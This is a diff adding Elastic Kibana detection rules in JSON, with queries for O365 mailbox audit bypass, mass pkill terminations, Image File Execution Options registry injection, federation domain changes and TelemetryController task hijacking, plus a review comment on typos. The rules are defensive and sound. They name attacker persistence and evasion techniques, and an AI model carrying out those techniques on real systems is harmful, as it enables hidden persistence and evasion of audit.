@@ -0,0 +1,91 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the occurrence of mailbox audit bypass associations. The mailbox audit is responsible for logging specified mailbox events (like accessing a folder or a message or permanently deleting a message). However, actions taken by some authorized accounts, such as accounts used by third-party tools or accounts used for lawful monitoring, can create a large number of mailbox audit log entries and may not be of interest to your organization. Because of this, administrators can create bypass associations, allowing certain accounts to perform their tasks without being logged. Attackers can abuse this allowlist mechanism to conceal actions taken, as the mailbox audit will log no activity done by the account.", + "false_positives": [ + "Legitimate allowlisting of noisy accounts" + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "O365 Mailbox Audit Logging Bypass", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.action:Set-MailboxAuditBypassAssociation and event.outcome:success\n", + "references": [ + "https://twitter.com/misconfig/status/1476144066807140355" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "675239ea-c1bc-4467-a6d3-b9e2cc7f676d", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + 
"Tactic: Initial Access", + "Tactic: Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 206 + }, + "id": "675239ea-c1bc-4467-a6d3-b9e2cc7f676d_206", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/67f8443a-4ff3-4a70-916d-3cfa3ae9f02b_112.json b/packages/security_detection_engine/kibana/security_rule/67f8443a-4ff3-4a70-916d-3cfa3ae9f02b_112.json new file mode 100644 index 00000000000..eda17391128 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/67f8443a-4ff3-4a70-916d-3cfa3ae9f02b_112.json 
@@ -0,0 +1,101 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule identifies a high number (10) of process terminations via pkill from the same host within a short time period.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "High Number of Process Terminations", + "note": "## Triage and analysis\n\n### Investigating High Number of Process Terminations\n\nAttackers can kill processes for a variety of purposes. For example, they can kill process associated with business applications and databases to release the lock on files used by these applications so they may be encrypted,or stop security and backup solutions, etc.\n\nThis rule identifies a high number (10) of process terminations via pkill from the same host within a short time period.\n\n#### Possible investigation steps\n\n- Examine the entry point to the host and user in action via the Analyse View.\n - Identify the session entry leader and session user.\n- Examine the contents of session leading to the process termination(s) via the Session View.\n - Examine the command execution pattern in the session, which may lead to suspricous activities.\n- Examine the process killed during the malicious execution\n - Identify imment threat to the system from the process killed.\n - Take necessary incident response actions to respawn necessary process.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further destructive behavior, which is commonly associated with this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Reimage the host operating system or restore it to the operational state.\n- If any other destructive action was identified on the host, it is recommended to prioritize the investigation and look for ransomware preparation and execution activities.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.category:process and host.os.type:linux and event.type:start and process.name:\"pkill\" and process.args:\"-f\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "67f8443a-4ff3-4a70-916d-3cfa3ae9f02b", + "setup": "## Setup\n\nThis rule 
requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Impact", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1489", + "name": "Service Stop", + "reference": "https://attack.mitre.org/techniques/T1489/" + } + ] + } + ], + "threshold": { + "field": [ + "host.id", + "process.executable", + "user.name" + ], + "value": 10 + }, + "timestamp_override": "event.ingested", + "type": "threshold", + "version": 112 + }, + "id": "67f8443a-4ff3-4a70-916d-3cfa3ae9f02b_112", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/6839c821-011d-43bd-bd5b-acff00257226_106.json b/packages/security_detection_engine/kibana/security_rule/6839c821-011d-43bd-bd5b-acff00257226_106.json new file mode 100644 index 00000000000..df341f91423 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/6839c821-011d-43bd-bd5b-acff00257226_106.json 
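Review bot: The investigation guide in the `note` field of 67f8443a-4ff3-4a70-916d-3cfa3ae9f02b_112.json carries two typos that will be shown verbatim in the alert flyout: `suspricous` (should be `suspicious`) and `imment` (should be `imminent`). The `setup` text also pins the agent-policy link to `https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html`, whereas the otherwise identical setup block in 66da12b1-ac83-40eb-814c-07ed1d82b7b9_106.json earlier in this diff uses `https://www.elastic.co/guide/en/fleet/current/agent-policy.html`; the `current` form is the one that will not go stale. If these JSON files are generated from the upstream rule definitions, both corrections belong there rather than in this file.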
@@ -0,0 +1,101 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "The Debugger and SilentProcessExit registry keys can allow an adversary to intercept the execution of files, causing a different process to be executed. This functionality can be abused by an adversary to establish persistence.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Image File Execution Options Injection", + "query": "registry where host.os.type == \"windows\" and length(registry.data.strings) > 0 and\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*.exe\\\\Debugger\",\n \"HKLM\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*\\\\Debugger\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\",\n \"HKLM\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*.exe\\\\Debugger\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*\\\\Debugger\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\"\n ) and\n /* add FPs here */\n not registry.data.strings regex~ (\"\"\"C:\\\\Program Files( \\(x86\\))?\\\\ThinKiosk\\\\thinkiosk\\.exe\"\"\", \"\"\".*\\\\PSAppDeployToolkit\\\\.*\"\"\")\n", + "references": [ + 
"https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "6839c821-011d-43bd-bd5b-acff00257226", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.012", + "name": "Image File Execution Options Injection", + "reference": "https://attack.mitre.org/techniques/T1546/012/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 106 + }, + "id": "6839c821-011d-43bd-bd5b-acff00257226_106", + "type": "security-rule" +} \ No newline at end of file 
diff --git a/packages/security_detection_engine/kibana/security_rule/6839c821-011d-43bd-bd5b-acff00257226_107.json b/packages/security_detection_engine/kibana/security_rule/6839c821-011d-43bd-bd5b-acff00257226_107.json new file mode 100644 index 00000000000..b9bec088a7a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/6839c821-011d-43bd-bd5b-acff00257226_107.json 
@@ -0,0 +1,101 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "The Debugger and SilentProcessExit registry keys can allow an adversary to intercept the execution of files, causing a different process to be executed. This functionality can be abused by an adversary to establish persistence.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.registry-*", + "endgame-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Image File Execution Options Injection", + "query": "registry where host.os.type == \"windows\" and length(registry.data.strings) > 0 and\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*.exe\\\\Debugger\",\n \"HKLM\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*\\\\Debugger\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\",\n \"HKLM\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*.exe\\\\Debugger\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*\\\\Debugger\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\"\n ) and\n /* add FPs here */\n not registry.data.strings regex~ (\"\"\"C:\\\\Program Files( \\(x86\\))?\\\\ThinKiosk\\\\thinkiosk\\.exe\"\"\", \"\"\".*\\\\PSAppDeployToolkit\\\\.*\"\"\")\n", + "references": [ + 
"https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "6839c821-011d-43bd-bd5b-acff00257226", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.012", + "name": "Image File Execution Options Injection", + "reference": "https://attack.mitre.org/techniques/T1546/012/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "6839c821-011d-43bd-bd5b-acff00257226_107", + "type": "security-rule" +} \ No newline at end of file 
diff --git a/packages/security_detection_engine/kibana/security_rule/684554fc-0777-47ce-8c9b-3d01f198d7f8_103.json b/packages/security_detection_engine/kibana/security_rule/684554fc-0777-47ce-8c9b-3d01f198d7f8_103.json new file mode 100644 index 00000000000..32baae485fc --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/684554fc-0777-47ce-8c9b-3d01f198d7f8_103.json 
@@ -0,0 +1,97 @@ +{ + "attributes": { + "author": [ + "Austin Songer" + ], + "description": "Identifies a new or modified federation domain, which can be used to create a trust between O365 and an external identity provider.", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "New or Modified Federation Domain", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:(\"Set-AcceptedDomain\" or\n\"Set-MsolDomainFederationSettings\" or \"Add-FederatedDomain\" or \"New-AcceptedDomain\" or \"Remove-AcceptedDomain\" or \"Remove-FederatedDomain\") and\nevent.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-accepteddomain?view=exchange-ps", + "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-federateddomain?view=exchange-ps", + "https://docs.microsoft.com/en-us/powershell/module/exchange/new-accepteddomain?view=exchange-ps", + "https://docs.microsoft.com/en-us/powershell/module/exchange/add-federateddomain?view=exchange-ps", + "https://docs.microsoft.com/en-us/powershell/module/exchange/set-accepteddomain?view=exchange-ps", + "https://docs.microsoft.com/en-us/powershell/module/msonline/set-msoldomainfederationsettings?view=azureadps-1.0" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "684554fc-0777-47ce-8c9b-3d01f198d7f8", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data 
is required to be compatible with this rule.", + "severity": "low", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Identity and Access Audit", + "Tactic: Privilege Escalation" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1484", + "name": "Domain Policy Modification", + "reference": "https://attack.mitre.org/techniques/T1484/", + "subtechnique": [ + { + "id": "T1484.002", + "name": "Domain Trust Modification", + "reference": "https://attack.mitre.org/techniques/T1484/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 103 + }, + "id": "684554fc-0777-47ce-8c9b-3d01f198d7f8_103", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/684554fc-0777-47ce-8c9b-3d01f198d7f8_105.json b/packages/security_detection_engine/kibana/security_rule/684554fc-0777-47ce-8c9b-3d01f198d7f8_105.json new file mode 100644 index 00000000000..27f9591583e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/684554fc-0777-47ce-8c9b-3d01f198d7f8_105.json 
@@ -0,0 +1,97 @@ +{ + "attributes": { + "author": [ + "Austin Songer" + ], + "description": "Identifies a new or modified federation domain, which can be used to create a trust between O365 and an external identity provider.", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "New or Modified Federation Domain", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:(\"Set-AcceptedDomain\" or\n\"Set-MsolDomainFederationSettings\" or \"Add-FederatedDomain\" or \"New-AcceptedDomain\" or \"Remove-AcceptedDomain\" or \"Remove-FederatedDomain\") and\nevent.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-accepteddomain?view=exchange-ps", + "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-federateddomain?view=exchange-ps", + "https://docs.microsoft.com/en-us/powershell/module/exchange/new-accepteddomain?view=exchange-ps", + "https://docs.microsoft.com/en-us/powershell/module/exchange/add-federateddomain?view=exchange-ps", + "https://docs.microsoft.com/en-us/powershell/module/exchange/set-accepteddomain?view=exchange-ps", + "https://docs.microsoft.com/en-us/powershell/module/msonline/set-msoldomainfederationsettings?view=azureadps-1.0" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "684554fc-0777-47ce-8c9b-3d01f198d7f8", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data 
is required to be compatible with this rule.", + "severity": "low", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Identity and Access Audit", + "Tactic: Privilege Escalation" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1484", + "name": "Domain Policy Modification", + "reference": "https://attack.mitre.org/techniques/T1484/", + "subtechnique": [ + { + "id": "T1484.002", + "name": "Domain Trust Modification", + "reference": "https://attack.mitre.org/techniques/T1484/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 105 + }, + "id": "684554fc-0777-47ce-8c9b-3d01f198d7f8_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/684554fc-0777-47ce-8c9b-3d01f198d7f8_206.json b/packages/security_detection_engine/kibana/security_rule/684554fc-0777-47ce-8c9b-3d01f198d7f8_206.json new file mode 100644 index 00000000000..c48fc9a365e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/684554fc-0777-47ce-8c9b-3d01f198d7f8_206.json 
@@ -0,0 +1,97 @@ +{ + "attributes": { + "author": [ + "Austin Songer" + ], + "description": "Identifies a new or modified federation domain, which can be used to create a trust between O365 and an external identity provider.", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "New or Modified Federation Domain", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:(\"Set-AcceptedDomain\" or\n\"Set-MsolDomainFederationSettings\" or \"Add-FederatedDomain\" or \"New-AcceptedDomain\" or \"Remove-AcceptedDomain\" or \"Remove-FederatedDomain\") and\nevent.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-accepteddomain?view=exchange-ps", + "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-federateddomain?view=exchange-ps", + "https://docs.microsoft.com/en-us/powershell/module/exchange/new-accepteddomain?view=exchange-ps", + "https://docs.microsoft.com/en-us/powershell/module/exchange/add-federateddomain?view=exchange-ps", + "https://docs.microsoft.com/en-us/powershell/module/exchange/set-accepteddomain?view=exchange-ps", + "https://docs.microsoft.com/en-us/powershell/module/msonline/set-msoldomainfederationsettings?view=azureadps-1.0" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "684554fc-0777-47ce-8c9b-3d01f198d7f8", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data 
is required to be compatible with this rule.", + "severity": "low", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Identity and Access Audit", + "Tactic: Privilege Escalation" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1484", + "name": "Domain Policy Modification", + "reference": "https://attack.mitre.org/techniques/T1484/", + "subtechnique": [ + { + "id": "T1484.002", + "name": "Domain Trust Modification", + "reference": "https://attack.mitre.org/techniques/T1484/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 206 + }, + "id": "684554fc-0777-47ce-8c9b-3d01f198d7f8_206", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/68921d85-d0dc-48b3-865f-43291ca2c4f2_109.json b/packages/security_detection_engine/kibana/security_rule/68921d85-d0dc-48b3-865f-43291ca2c4f2_109.json new file mode 100644 index 00000000000..9a9ad9b52a9 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/68921d85-d0dc-48b3-865f-43291ca2c4f2_109.json 
@@ -0,0 +1,138 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the successful hijack of Microsoft Compatibility Appraiser scheduled task to establish persistence with an integrity level of system.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Persistence via TelemetryController Scheduled Task Hijack", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"CompatTelRunner.exe\" and process.args : \"-cv*\" and\n not process.name : (\"conhost.exe\",\n \"DeviceCensus.exe\",\n \"CompatTelRunner.exe\",\n \"DismHost.exe\",\n \"rundll32.exe\",\n \"powershell.exe\")\n", + "references": [ + "https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "68921d85-d0dc-48b3-865f-43291ca2c4f2", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - 
https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.005", + "name": "Scheduled Task", + "reference": "https://attack.mitre.org/techniques/T1053/005/" + } + ] + }, + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.005", + "name": "Scheduled Task", + "reference": "https://attack.mitre.org/techniques/T1053/005/" + } + ] + }, + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "68921d85-d0dc-48b3-865f-43291ca2c4f2_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/68921d85-d0dc-48b3-865f-43291ca2c4f2_110.json b/packages/security_detection_engine/kibana/security_rule/68921d85-d0dc-48b3-865f-43291ca2c4f2_110.json new file mode 100644 index 00000000000..cf5accac00a --- /dev/null 
+++ b/packages/security_detection_engine/kibana/security_rule/68921d85-d0dc-48b3-865f-43291ca2c4f2_110.json 
